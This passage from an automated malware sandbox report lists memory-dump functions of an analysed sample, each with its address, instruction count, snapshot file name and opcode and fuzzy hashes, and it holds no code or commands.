                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0b723ac30c1679cb725db233cc7ef4b93e8116bd9362e427b4f9afdccb145b5c
                    • Instruction ID: b1d6ac760439c03affa9e1b19a77de3e34475bd294ffb510ca53236e9364b783
                    • Opcode Fuzzy Hash: 0b723ac30c1679cb725db233cc7ef4b93e8116bd9362e427b4f9afdccb145b5c
                    • Instruction Fuzzy Hash: 9051D03190CB4C8FDB19EB68D8457E9BBF1FB59310F1442AED049D7292CB75A845CB82
                    Function 00007FF848F2DBBD Relevance: .2, Instructions: 176COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b25d2a7609cfc50e8d090969876a1088d998452a5a77bcaf16c3f219041f2e2e
                    • Instruction ID: dc91f5f2de1ebaab3b3b76a72099721f26455aa834eb7ca6981f3792bee34160
                    • Opcode Fuzzy Hash: b25d2a7609cfc50e8d090969876a1088d998452a5a77bcaf16c3f219041f2e2e
                    • Instruction Fuzzy Hash: 40510670D09A1D8FDB94EBA8D895BECBBB1FF59341F50056AD00DE7292CB75A881CB40
                    Function 00007FF848F237E5 Relevance: .2, Instructions: 174COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 22fbcb9c48a572261946287ad916ec731ae3b397d686187e4c9b388faab80fe3
                    • Instruction ID: e78c76141efe005d86947de8db3cb7651359306fc9fe13f656ccb6ddef1589f3
                    • Opcode Fuzzy Hash: 22fbcb9c48a572261946287ad916ec731ae3b397d686187e4c9b388faab80fe3
                    • Instruction Fuzzy Hash: D951D67094D68D8FDB45EF68D855AE97BF0FF15310F0500AAE00DDB6A2CA3DA882CB51
                    Function 00007FF848F14611 Relevance: .2, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88fb07f86f8d9dd79b37af23aae217968be9ae5a7fbdf9c1589f5b859f0e6c0b
                    • Instruction ID: c6bcd2ed6d8eb9db9e0937eb4097e3374568df3d381fbc535a04e37c7a91d169
                    • Opcode Fuzzy Hash: 88fb07f86f8d9dd79b37af23aae217968be9ae5a7fbdf9c1589f5b859f0e6c0b
                    • Instruction Fuzzy Hash: DA51C370D19A1D8FDB94EF98D899BADBBB1FF68301F10016AD00DE7291DB386841CB44
                    Function 00007FF848F28D7D Relevance: .2, Instructions: 169COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 113bae248846e867f9217b1d393d0b386e81e6d2af88de38d66ff7cb669d4941
                    • Instruction ID: d902d0e7a95b7de73d35a423f36dd2e9db131dae0d9fc51a38c2128cfdafbbd3
                    • Opcode Fuzzy Hash: 113bae248846e867f9217b1d393d0b386e81e6d2af88de38d66ff7cb669d4941
                    • Instruction Fuzzy Hash: C651073191CB884FDB199F689C066E97BF1EB56320F0442AFE449D7292CB74A845CBC2
                    Function 00007FF848F22541 Relevance: .2, Instructions: 162COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e00d25467c6b77993e12304afbb29d6ad4a4c50f49fc68c5d223028baf19bd56
                    • Instruction ID: 82f81ebbec51b4d84e1d9659a025e2f6802b358ccd9cc6e41efb9f2b8b9ddc36
                    • Opcode Fuzzy Hash: e00d25467c6b77993e12304afbb29d6ad4a4c50f49fc68c5d223028baf19bd56
                    • Instruction Fuzzy Hash: 2451A470D1892D9FDB98EB68D895BACB7B2FB68341F5045BAD00DE3291DF356981CB00
                    Function 00007FF848F10AB9 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b00b3465b9248724d95a76f9ac7d8b1b696dae285627d3d28de95fc4d8025aff
                    • Instruction ID: 012d94bb508c2f0d532880340ac8cb2a0652b7d0b208a198e25e2421215fc8f6
                    • Opcode Fuzzy Hash: b00b3465b9248724d95a76f9ac7d8b1b696dae285627d3d28de95fc4d8025aff
                    • Instruction Fuzzy Hash: 7D51D870E18A5D8FDF98EF98C8996EDBBB1FFA8341F14012AD409E7295CB349845CB44
                    Function 00007FF848F17206 Relevance: .2, Instructions: 158COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d7637725a68d56b2ae42725809d95196bddc4678ae8ba684271c679c331514f0
                    • Instruction ID: 67c5d9ccc931b609f82f46679b158cda00c374477924b4101082e96fb91604ce
                    • Opcode Fuzzy Hash: d7637725a68d56b2ae42725809d95196bddc4678ae8ba684271c679c331514f0
                    • Instruction Fuzzy Hash: A9510471D0896E8EEBA4EB5898547F8B7A1FB68340F5041BAD00EE3285DF346D858B54
                    Function 00007FF848F16AD1 Relevance: .2, Instructions: 150COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5d7595ff5a4afa42c31d98ff0a6215cd3cd0cd1fa27cfd09705fb49174c3131
                    • Instruction ID: 1f29285aa3317fb28e12dc54caf56824bb3c91e8bf60fb486e3568f3c7aa7a9f
                    • Opcode Fuzzy Hash: f5d7595ff5a4afa42c31d98ff0a6215cd3cd0cd1fa27cfd09705fb49174c3131
                    • Instruction Fuzzy Hash: 4A418A71E1D61D8FDB44EFA8E8556EDBBB1FF58300F14017AE009E7282DB29AC018B55
                    Function 00007FF848F16129 Relevance: .2, Instructions: 150COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3e02460dccccefcf37f1c1a9bd20510f31650395acf5a6d91843f9ce06df5459
                    • Instruction ID: 5dc52eeb652902eccc5524ac73e2a852bf1801c2840460c65853d43180e380cd
                    • Opcode Fuzzy Hash: 3e02460dccccefcf37f1c1a9bd20510f31650395acf5a6d91843f9ce06df5459
                    • Instruction Fuzzy Hash: 84513675D0CA598FEB95EBA884947A8BBB1FF95340F50457AC009A72C6DB3C5C85CB40
                    Function 00007FF848F1B305 Relevance: .1, Instructions: 146COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 05a65e96f0ef8c4f1b0287199f3fc5e8ff512c29c929be69b5150b7a96ebfefa
                    • Instruction ID: c20fc3a4824a97b22e426de04dad04dd3601d26d5e3aaec44a0d02a05c7f19e6
                    • Opcode Fuzzy Hash: 05a65e96f0ef8c4f1b0287199f3fc5e8ff512c29c929be69b5150b7a96ebfefa
                    • Instruction Fuzzy Hash: 74510F70D18A1D8FEB98EFA8D4946FDBBB1EF58341F44003AE00AE7291CB386855CB44
                    Function 00007FF848F1535F Relevance: .1, Instructions: 136COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 848b1a18fb753fa2cc589007c9300a881f6476cca364d69e6d1a97d4df3c2862
                    • Instruction ID: 79f4e7fdf4c50ed37f6cf1fba9083cd0adc1edc1a8bc932a3292c9360840c98d
                    • Opcode Fuzzy Hash: 848b1a18fb753fa2cc589007c9300a881f6476cca364d69e6d1a97d4df3c2862
                    • Instruction Fuzzy Hash: 0141E970D1895D9FDF94EBA8D895AACBBF1FF68341F50016AD00DE7296CB34A881CB40
                    Function 00007FF848F21C97 Relevance: .1, Instructions: 127COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 611119d1e9aede2778dbf24004a39bfb7a2dc54d51acbb5cf80a76e638460fdb
                    • Instruction ID: 6109f6757695a55c7d290d24fb1fa7e30ce49e18185eb1741e2d5c1c0873c4ab
                    • Opcode Fuzzy Hash: 611119d1e9aede2778dbf24004a39bfb7a2dc54d51acbb5cf80a76e638460fdb
                    • Instruction Fuzzy Hash: 62415031A0C949DFDF89EB28D495DA573E1FBA9310B0406AAD40ED3192DE29E885CB85
                    Function 00007FF848F19799 Relevance: .1, Instructions: 126COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7414f8b95d9c2849823e0e3b028c01271c2e7aa6cead2ef5e05fda8e75c03b2
                    • Instruction ID: 79f639b70ac99fcf90cb2c79b01280c6322f184319ac9bde944a79f94a743b26
                    • Opcode Fuzzy Hash: f7414f8b95d9c2849823e0e3b028c01271c2e7aa6cead2ef5e05fda8e75c03b2
                    • Instruction Fuzzy Hash: 2C31BF30B1CF098FDBA9EB18845462273E1FF69750B9502BDC449C769ACB24FC4287C5
                    Function 00007FF848F10C6D Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d2f32b417b4075d7759ea1fd34673dabc9da76b1285bab0d32eb6a6f606bb4a5
                    • Instruction ID: ed729710f744fabbd1a6365d639163109c6f9df59b81396675f5a613764a0b26
                    • Opcode Fuzzy Hash: d2f32b417b4075d7759ea1fd34673dabc9da76b1285bab0d32eb6a6f606bb4a5
                    • Instruction Fuzzy Hash: F3411471C0962D8FDB91EFA8D4486EDBBB0FF55340F50047AE409E3292DB78A945CB80
                    Function 00007FF848F11521 Relevance: .1, Instructions: 121COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: be6c7534011634605051c209a6ecf7fb04c31eaa40c04be9ff9f1fad25d543fd
                    • Instruction ID: e05ddf14b0b555d53b462c926cdcff8c741a1ec423ab660ba46b6cc4ba55262c
                    • Opcode Fuzzy Hash: be6c7534011634605051c209a6ecf7fb04c31eaa40c04be9ff9f1fad25d543fd
                    • Instruction Fuzzy Hash: 5341E534A1891D8FDF98EB58C895BACB7F1FB98304F5440A9D04EE3692DF75AD818B40
                    Function 00007FF848F21D41 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8a550e67401479933a4b64b58e684424fe2d3c1d5880558fc667bec77685f5cc
                    • Instruction ID: 359725c262fb60e6da516efc9ea9c12eebcd1fb74ebd1786aa9d7149ed5b72a2
                    • Opcode Fuzzy Hash: 8a550e67401479933a4b64b58e684424fe2d3c1d5880558fc667bec77685f5cc
                    • Instruction Fuzzy Hash: F3318131A0C949DFCB89EF28C495EA577E1FFA9310B0406ADD44AC71D2CE29EC85CB85
                    Function 00007FF848F2DDBD Relevance: .1, Instructions: 117COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d1d763281f85eb7a5a72c767169f87bd28678dcd55485eacd25cf16ce10057eb
                    • Instruction ID: d2fb71c6f7b73497dd4194edf6b130ebdbbeae77ec116d9e9dbd4d2c17428583
                    • Opcode Fuzzy Hash: d1d763281f85eb7a5a72c767169f87bd28678dcd55485eacd25cf16ce10057eb
                    • Instruction Fuzzy Hash: 8F415B70C1DA8D9FEB41EBA8D8656EDBBB1EF59350F44047AD00CE31D2CE295981CB11
                    Function 00007FF848F21CDB Relevance: .1, Instructions: 115COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 665b216004bba3532233f3eadbddaa3f9e2b218330413203e0c7d3cde3623c31
                    • Instruction ID: 94d4059de1d17baa76e256ec1ea448aed7e43b44bc5395824f95522aa85deda7
                    • Opcode Fuzzy Hash: 665b216004bba3532233f3eadbddaa3f9e2b218330413203e0c7d3cde3623c31
                    • Instruction Fuzzy Hash: 08318131A0C949DFCB89EF28C495EA573E1FB69310B0406A9D40AC7192CF29E885CB85
                    Function 00007FF848F10AD0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: afe22432f354a2f84fbe1ad750de21a760e8bb7464ac2bec905fdc82e9732d03
                    • Instruction ID: 79eb3bd534cc0adaffbf55210ad0169a34fa37c003384ac32fdd1ae6a5286570
                    • Opcode Fuzzy Hash: afe22432f354a2f84fbe1ad750de21a760e8bb7464ac2bec905fdc82e9732d03
                    • Instruction Fuzzy Hash: 5631C970E1891D8FDF94EF58D495BEEBBB1FBA8345F10012AD409E3295CB35A845CB84
                    Function 00007FF848F17362 Relevance: .1, Instructions: 109COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f2b65f92ed3aeac9b171b759aaea2073e2725ba47a7b01af9809fec88deb3ec
                    • Instruction ID: 6c12950787b891c8cdf8d997b964009bd1f88808c25128ddb9be8d59eb8c64c1
                    • Opcode Fuzzy Hash: 3f2b65f92ed3aeac9b171b759aaea2073e2725ba47a7b01af9809fec88deb3ec
                    • Instruction Fuzzy Hash: D1311830E0C91D8EDB98EB5898817F9B7B1EB59340F5051B5D00DE3286CF38AD818B48
                    Function 00007FF848F268E5 Relevance: .1, Instructions: 107COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5736f1768c2960683b33e076457d7946c9888621693c959be86abdc45f201949
                    • Instruction ID: 15c65f1fc8143fe0682b0ef364c1c7df0758f2fcdee1b02529e4bcc53a3929c1
                    • Opcode Fuzzy Hash: 5736f1768c2960683b33e076457d7946c9888621693c959be86abdc45f201949
                    • Instruction Fuzzy Hash: BE31E171D0C9899FD7D4EB6C9499AA97BE1FFA9300F1401AAD00DC31D2DF2DAC808706
                    Function 00007FF848F14BE9 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 051760832b154f228281ee1c9aedd215c3ab795bbc634a522a38a39da8efc417
                    • Instruction ID: ac4d3035b6666f8d09788ba2e5b7919c7034f47f65a5ee3b760adf02a3186931
                    • Opcode Fuzzy Hash: 051760832b154f228281ee1c9aedd215c3ab795bbc634a522a38a39da8efc417
                    • Instruction Fuzzy Hash: 9C415970D0D6598FEB56EFA4C8596E9BBF2FF59300F5005BAD009E7292CB395981CB40
                    Function 00007FF848F1BBF5 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a6b87c18612f3e1b8324882115acd932b8f247564ba44496d8931dfbee925b8
                    • Instruction ID: cf1348c4d61710a37c5832cff3caf2faa100ad6d41fa90af26eca7222ce72b36
                    • Opcode Fuzzy Hash: 1a6b87c18612f3e1b8324882115acd932b8f247564ba44496d8931dfbee925b8
                    • Instruction Fuzzy Hash: CD310271E0C9499FD7D4EB2C9499ABA77E1FBA9311F1001BAD00DC32D2DF2CA8818756
                    Function 00007FF848F189D6 Relevance: .1, Instructions: 104COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9cdad83ae9f95dffd555fdda8de0c9421fa2b00ceea5ba8f0679cf59b888f9a3
                    • Instruction ID: ec9b20d71855a7eaaecaeceea9afbbdd89f50952d293df2b664041dca3b92ceb
                    • Opcode Fuzzy Hash: 9cdad83ae9f95dffd555fdda8de0c9421fa2b00ceea5ba8f0679cf59b888f9a3
                    • Instruction Fuzzy Hash: FB311B71E1895D9FDB94EB98D8957ACBBB1FB58340F40006AC00DE7285DF7869859B40
                    Function 00007FF848F1CA4D Relevance: .1, Instructions: 100COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: afba13c384d1a2a6069cf8e9e86be9ad5a921e8af1a75ce15a86a1014352a0d2
                    • Instruction ID: b9db27c281e3a539d9ac6375b1b2a8561f7779dea1caf627fd790cc0075c4880
                    • Opcode Fuzzy Hash: afba13c384d1a2a6069cf8e9e86be9ad5a921e8af1a75ce15a86a1014352a0d2
                    • Instruction Fuzzy Hash: 6C31F930A0E5864FD746FB3894969A67B61EF55310F1842FAD008CF1D7EA2DEC86C395
                    Function 00007FF848F18B4D Relevance: .1, Instructions: 100COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bbe492611356422824a3113dbfa91fa902002315423cef5e9dab859a3b01f9f
                    • Instruction ID: 5ec57c1accbb88978c77b460c53d2369803138b583cb84cd5bed6c7d7eb5f4e5
                    • Opcode Fuzzy Hash: 5bbe492611356422824a3113dbfa91fa902002315423cef5e9dab859a3b01f9f
                    • Instruction Fuzzy Hash: 82214971B1DE9E0FE7A9E72818251B63BD0EB55761B4501FBE44DC32D7CE085C028395
                    Function 00007FF848F1BC08 Relevance: .1, Instructions: 98COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c93b8facdc73558ce86f45be2a8a852fcc62b8e8d1045127c929792c436cb599
                    • Instruction ID: ef4cc700bcb9c343cabf3782f7482d9e28563f6b007e8029199768f6f61a6aaf
                    • Opcode Fuzzy Hash: c93b8facdc73558ce86f45be2a8a852fcc62b8e8d1045127c929792c436cb599
                    • Instruction Fuzzy Hash: B231B171D0C9499FD6D4EB6C9499AB677E1FBA9341F10017AD00DC32D2DF2CA8818756
                    Function 00007FF848F18C5F Relevance: .1, Instructions: 96COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cb636c1ae628145a5856968e39b8bbca7643bf5d78740e51b522c8ab55d3ed23
                    • Instruction ID: 023d0676a60376b684634f9ae00c4fab1712468d8b606afdd25ac8cdee9907a9
                    • Opcode Fuzzy Hash: cb636c1ae628145a5856968e39b8bbca7643bf5d78740e51b522c8ab55d3ed23
                    • Instruction Fuzzy Hash: 81216D21B2ED4F1FEA98B72CA15567963D1FFA4394F8005BAD40EC72CADE28EC454358
                    Function 00007FF848F1F349 Relevance: .1, Instructions: 93COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 904766fd3bff4a88b21e13de7ee2f098fd1894a12a140322278af1cead38899b
                    • Instruction ID: 2a1b9d2c9a19992582345b1831cc39048b1604251ea112baea396e746f4c48f7
                    • Opcode Fuzzy Hash: 904766fd3bff4a88b21e13de7ee2f098fd1894a12a140322278af1cead38899b
                    • Instruction Fuzzy Hash: F821E562A1EACA5FD396A72848641B2BBE0EF56355F0841BBD48AC71D7DE086C098345
                    Function 00007FF848F1D0E3 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 539f5d8a8f126731ad408ff2208088aa05ddb42e6b9c6396efb51dbc5e47bfb9
                    • Instruction ID: cf00ca8044c43bbdaa3a427264f947cda51ef77b654a229df296c0fa87388b2b
                    • Opcode Fuzzy Hash: 539f5d8a8f126731ad408ff2208088aa05ddb42e6b9c6396efb51dbc5e47bfb9
                    • Instruction Fuzzy Hash: 3B31D530E19A1D8FEB84EFA8C895AEDB7B1FF58340F600129D009E7282DB386841CB54
                    Function 00007FF848F13A8D Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a32297a41232e235b2da31a7290768419d22a9ca8527315bdbdf2c24f391d48
                    • Instruction ID: 9a1a7894a0cd7f8c77d8ccab3712a03feb300713de9c228ae97812b78f198598
                    • Opcode Fuzzy Hash: 9a32297a41232e235b2da31a7290768419d22a9ca8527315bdbdf2c24f391d48
                    • Instruction Fuzzy Hash: CD21AE31E0DA8A8FE799EB288C647A57BA0FF51341F0804B9D088D71D2DF796C45CB05
                    Function 00007FF848F11129 Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d1adb067009730360cb3db7d1b51ad3f67ac72382d1c750f78d1f8623a015158
                    • Instruction ID: d8f125394193db9e941a95dbf8c0652119626550af3706bea5b770fb58ce3129
                    • Opcode Fuzzy Hash: d1adb067009730360cb3db7d1b51ad3f67ac72382d1c750f78d1f8623a015158
                    • Instruction Fuzzy Hash: 80217C3190895D9FDF81EF68D859AEDBBF5FF58310F00016AE408E3292CB249841C790
                    Function 00007FF848F1EE38 Relevance: .1, Instructions: 90COMMON
